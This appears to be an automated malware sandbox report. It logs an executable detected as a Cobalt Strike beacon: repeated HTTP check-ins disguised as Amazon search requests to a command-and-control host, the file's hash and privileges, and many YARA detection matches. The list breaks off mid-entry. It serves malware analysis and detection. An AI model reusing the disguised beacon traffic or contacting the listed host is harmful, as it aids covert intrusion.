Dec 30, 2024 09:16:16.235898018 CET	497	OUT	GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1 Accept: / Host: p0.ssl.qhimg.com Cookie: skin=noskin;session-token=PdRgfX4+deu1k/mOzpK5nGIZPyQ6pY8uGpAG+N16OWbD5a+DiDF6abaXcFBw3fvEg9igEdJW5ZJWSiZaCD7qbDsZI74S6ob72tOZ3Mdp/sYYB4a3NA1ktpGm9VNXrGcvNuq7oq89Gmf7JhHJIYQLjwXeMIgpUVoTtb++Q8QFYmk=csm-hit=s-24KU11BB82RZSYGJ3BDK\|1419899012996 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Connection: Keep-Alive Cache-Control: no-cache
Dec 30, 2024 09:16:17.157418966 CET	374	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 08:16:16 GMT Server: Server x-amz-id-1: THKUYEZKCKPGY5T42PZT x-amz-id-2: a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo= X-Frame-Options: SAMEORIGIN X-Cache-Lookup: Cache Miss Content-Encoding: gzip Content-Length: 0 X-NWS-LOG-UUID: 15353977179188824405 Connection: keep-alive X-Cache-Lookup: Cache Miss
Dec 30, 2024 09:16:22.173614025 CET	497	OUT	GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1 Accept: / Host: p0.ssl.qhimg.com Cookie: skin=noskin;session-token=PdRgfX4+deu1k/mOzpK5nGIZPyQ6pY8uGpAG+N16OWbD5a+DiDF6abaXcFBw3fvEg9igEdJW5ZJWSiZaCD7qbDsZI74S6ob72tOZ3Mdp/sYYB4a3NA1ktpGm9VNXrGcvNuq7oq89Gmf7JhHJIYQLjwXeMIgpUVoTtb++Q8QFYmk=csm-hit=s-24KU11BB82RZSYGJ3BDK\|1419899012996 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Connection: Keep-Alive Cache-Control: no-cache
Dec 30, 2024 09:16:22.809137106 CET	373	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 08:16:22 GMT Server: Server x-amz-id-1: THKUYEZKCKPGY5T42PZT x-amz-id-2: a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo= X-Frame-Options: SAMEORIGIN X-Cache-Lookup: Cache Miss Content-Encoding: gzip Content-Length: 0 X-NWS-LOG-UUID: 8291988072787550614 Connection: keep-alive X-Cache-Lookup: Cache Miss
Dec 30, 2024 09:16:27.814014912 CET	497	OUT	GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1 Accept: / Host: p0.ssl.qhimg.com Cookie: skin=noskin;session-token=PdRgfX4+deu1k/mOzpK5nGIZPyQ6pY8uGpAG+N16OWbD5a+DiDF6abaXcFBw3fvEg9igEdJW5ZJWSiZaCD7qbDsZI74S6ob72tOZ3Mdp/sYYB4a3NA1ktpGm9VNXrGcvNuq7oq89Gmf7JhHJIYQLjwXeMIgpUVoTtb++Q8QFYmk=csm-hit=s-24KU11BB82RZSYGJ3BDK\|1419899012996 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Connection: Keep-Alive Cache-Control: no-cache
Dec 30, 2024 09:16:28.367325068 CET	374	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 08:16:28 GMT Server: Server x-amz-id-1: THKUYEZKCKPGY5T42PZT x-amz-id-2: a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo= X-Frame-Options: SAMEORIGIN X-Cache-Lookup: Cache Miss Content-Encoding: gzip Content-Length: 0 X-NWS-LOG-UUID: 13610971792911640949 Connection: keep-alive X-Cache-Lookup: Cache Miss
Dec 30, 2024 09:16:33.376581907 CET	497	OUT	GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1 Accept: / Host: p0.ssl.qhimg.com Cookie: skin=noskin;session-token=PdRgfX4+deu1k/mOzpK5nGIZPyQ6pY8uGpAG+N16OWbD5a+DiDF6abaXcFBw3fvEg9igEdJW5ZJWSiZaCD7qbDsZI74S6ob72tOZ3Mdp/sYYB4a3NA1ktpGm9VNXrGcvNuq7oq89Gmf7JhHJIYQLjwXeMIgpUVoTtb++Q8QFYmk=csm-hit=s-24KU11BB82RZSYGJ3BDK\|1419899012996 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Connection: Keep-Alive Cache-Control: no-cache
Dec 30, 2024 09:16:33.941281080 CET	373	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 08:16:33 GMT Server: Server x-amz-id-1: THKUYEZKCKPGY5T42PZT x-amz-id-2: a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo= X-Frame-Options: SAMEORIGIN X-Cache-Lookup: Cache Miss Content-Encoding: gzip Content-Length: 0 X-NWS-LOG-UUID: 5212236710473726559 Connection: keep-alive X-Cache-Lookup: Cache Miss
Dec 30, 2024 09:16:38.954734087 CET	497	OUT	GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1 Accept: / Host: p0.ssl.qhimg.com Cookie: skin=noskin;session-token=PdRgfX4+deu1k/mOzpK5nGIZPyQ6pY8uGpAG+N16OWbD5a+DiDF6abaXcFBw3fvEg9igEdJW5ZJWSiZaCD7qbDsZI74S6ob72tOZ3Mdp/sYYB4a3NA1ktpGm9VNXrGcvNuq7oq89Gmf7JhHJIYQLjwXeMIgpUVoTtb++Q8QFYmk=csm-hit=s-24KU11BB82RZSYGJ3BDK\|1419899012996 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Connection: Keep-Alive Cache-Control: no-cache
Dec 30, 2024 09:16:39.970186949 CET	373	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 08:16:39 GMT Server: Server x-amz-id-1: THKUYEZKCKPGY5T42PZT x-amz-id-2: a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo= X-Frame-Options: SAMEORIGIN X-Cache-Lookup: Cache Miss Content-Encoding: gzip Content-Length: 0 X-NWS-LOG-UUID: 3602315999117876902 Connection: keep-alive X-Cache-Lookup: Cache Miss
Dec 30, 2024 09:16:44.986553907 CET	497	OUT	GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1 Accept: / Host: p0.ssl.qhimg.com Cookie: skin=noskin;session-token=PdRgfX4+deu1k/mOzpK5nGIZPyQ6pY8uGpAG+N16OWbD5a+DiDF6abaXcFBw3fvEg9igEdJW5ZJWSiZaCD7qbDsZI74S6ob72tOZ3Mdp/sYYB4a3NA1ktpGm9VNXrGcvNuq7oq89Gmf7JhHJIYQLjwXeMIgpUVoTtb++Q8QFYmk=csm-hit=s-24KU11BB82RZSYGJ3BDK\|1419899012996 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Connection: Keep-Alive Cache-Control: no-cache
Dec 30, 2024 09:16:45.552669048 CET	374	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 08:16:45 GMT Server: Server x-amz-id-1: THKUYEZKCKPGY5T42PZT x-amz-id-2: a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo= X-Frame-Options: SAMEORIGIN X-Cache-Lookup: Cache Miss Content-Encoding: gzip Content-Length: 0 X-NWS-LOG-UUID: 13106395476993098023 Connection: keep-alive X-Cache-Lookup: Cache Miss
Dec 30, 2024 09:16:50.564080954 CET	497	OUT	GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1 Accept: / Host: p0.ssl.qhimg.com Cookie: skin=noskin;session-token=PdRgfX4+deu1k/mOzpK5nGIZPyQ6pY8uGpAG+N16OWbD5a+DiDF6abaXcFBw3fvEg9igEdJW5ZJWSiZaCD7qbDsZI74S6ob72tOZ3Mdp/sYYB4a3NA1ktpGm9VNXrGcvNuq7oq89Gmf7JhHJIYQLjwXeMIgpUVoTtb++Q8QFYmk=csm-hit=s-24KU11BB82RZSYGJ3BDK\|1419899012996 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Connection: Keep-Alive Cache-Control: no-cache
Dec 30, 2024 09:16:51.118261099 CET	373	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 08:16:50 GMT Server: Server x-amz-id-1: THKUYEZKCKPGY5T42PZT x-amz-id-2: a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo= X-Frame-Options: SAMEORIGIN X-Cache-Lookup: Cache Miss Content-Encoding: gzip Content-Length: 0 X-NWS-LOG-UUID: 6417270450554782058 Connection: keep-alive X-Cache-Lookup: Cache Miss
Dec 30, 2024 09:16:56.142126083 CET	497	OUT	GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1 Accept: / Host: p0.ssl.qhimg.com Cookie: skin=noskin;session-token=PdRgfX4+deu1k/mOzpK5nGIZPyQ6pY8uGpAG+N16OWbD5a+DiDF6abaXcFBw3fvEg9igEdJW5ZJWSiZaCD7qbDsZI74S6ob72tOZ3Mdp/sYYB4a3NA1ktpGm9VNXrGcvNuq7oq89Gmf7JhHJIYQLjwXeMIgpUVoTtb++Q8QFYmk=csm-hit=s-24KU11BB82RZSYGJ3BDK\|1419899012996 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Connection: Keep-Alive Cache-Control: no-cache
Dec 30, 2024 09:16:57.149977922 CET	373	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 08:16:56 GMT Server: Server x-amz-id-1: THKUYEZKCKPGY5T42PZT x-amz-id-2: a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo= X-Frame-Options: SAMEORIGIN X-Cache-Lookup: Cache Miss Content-Encoding: gzip Content-Length: 0 X-NWS-LOG-UUID: 1806853183501537024 Connection: keep-alive X-Cache-Lookup: Cache Miss
Dec 30, 2024 09:17:02.157802105 CET	497	OUT	GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1 Accept: / Host: p0.ssl.qhimg.com Cookie: skin=noskin;session-token=PdRgfX4+deu1k/mOzpK5nGIZPyQ6pY8uGpAG+N16OWbD5a+DiDF6abaXcFBw3fvEg9igEdJW5ZJWSiZaCD7qbDsZI74S6ob72tOZ3Mdp/sYYB4a3NA1ktpGm9VNXrGcvNuq7oq89Gmf7JhHJIYQLjwXeMIgpUVoTtb++Q8QFYmk=csm-hit=s-24KU11BB82RZSYGJ3BDK\|1419899012996 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Connection: Keep-Alive Cache-Control: no-cache
Dec 30, 2024 09:17:02.804416895 CET	374	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 08:17:02 GMT Server: Server x-amz-id-1: THKUYEZKCKPGY5T42PZT x-amz-id-2: a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo= X-Frame-Options: SAMEORIGIN X-Cache-Lookup: Cache Miss Content-Encoding: gzip Content-Length: 0 X-NWS-LOG-UUID: 13051291916191873205 Connection: keep-alive X-Cache-Lookup: Cache Miss

Target ID:	0
Start time:	03:14:56
Start date:	30/12/2024
Path:	C:\Users\user\Desktop\Z9fvmHepQC.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Z9fvmHepQC.exe"
Imagebase:	0x7ff66dfa0000
File size:	5'258'240 bytes
MD5 hash:	1E53F1EAFB546110A915AC383181AAA6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2009341237.00000215D77EE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2009488257.00000215D77EE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2009224813.00000215D77E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2009224813.00000215D77E5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2009341237.00000215D77FC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000003.2008238134.00000215D7841000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2008238134.00000215D7841000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2008238134.00000215D7841000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2026273543.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2026273543.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000003.2026273543.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000003.2026273543.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2026273543.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2026273543.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2026273543.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2037126514.00000215D7E1A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2037126514.00000215D7E1A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000003.2037126514.00000215D7E1A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000003.2037126514.00000215D7E1A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2037126514.00000215D7E1A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2037126514.00000215D7E1A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2037126514.00000215D7E1A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2009315322.00000215D77ED000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3255811510.0000021658210000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3255811510.0000021658210000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.3255811510.0000021658210000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.3255811510.0000021658210000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000002.3255811510.0000021658210000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.3255811510.0000021658210000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000000.00000002.3255811510.0000021658210000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3254159034.00000215D7691000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3254159034.00000215D7691000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.3254159034.00000215D7691000.00000002.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.3254159034.00000215D7691000.00000002.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000002.3254159034.00000215D7691000.00000002.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.3254159034.00000215D7691000.00000002.00001000.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000000.00000002.3254159034.00000215D7691000.00000002.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2008178877.00000215D7B11000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2008178877.00000215D7B11000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000003.2008178877.00000215D7B11000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000003.2008178877.00000215D7B11000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2008178877.00000215D7B11000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2008178877.00000215D7B11000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2008178877.00000215D7B11000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2027416947.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2027416947.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000003.2027416947.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000003.2027416947.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2027416947.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2027416947.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2027416947.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2008352809.00000215D77DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2008352809.00000215D77DA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2017276190.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2017276190.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000003.2017276190.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000003.2017276190.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2017276190.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2017276190.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2017276190.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3254928165.00000215D7940000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3254928165.00000215D7940000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.3254928165.00000215D7940000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.3254928165.00000215D7940000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.3254928165.00000215D7940000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000002.3254928165.00000215D7940000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2033734612.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2033734612.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000003.2033734612.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000003.2033734612.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2033734612.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2033734612.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2033734612.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2034996552.00000215D7DD7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2034996552.00000215D7DD7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000003.2034996552.00000215D7DD7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000003.2034996552.00000215D7DD7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2034996552.00000215D7DD7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2034996552.00000215D7DD7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2034996552.00000215D7DD7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2035286946.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2035286946.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000003.2035286946.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000003.2035286946.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2035286946.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2035286946.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2035286946.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2029066908.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2029066908.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000003.2029066908.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000003.2029066908.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: 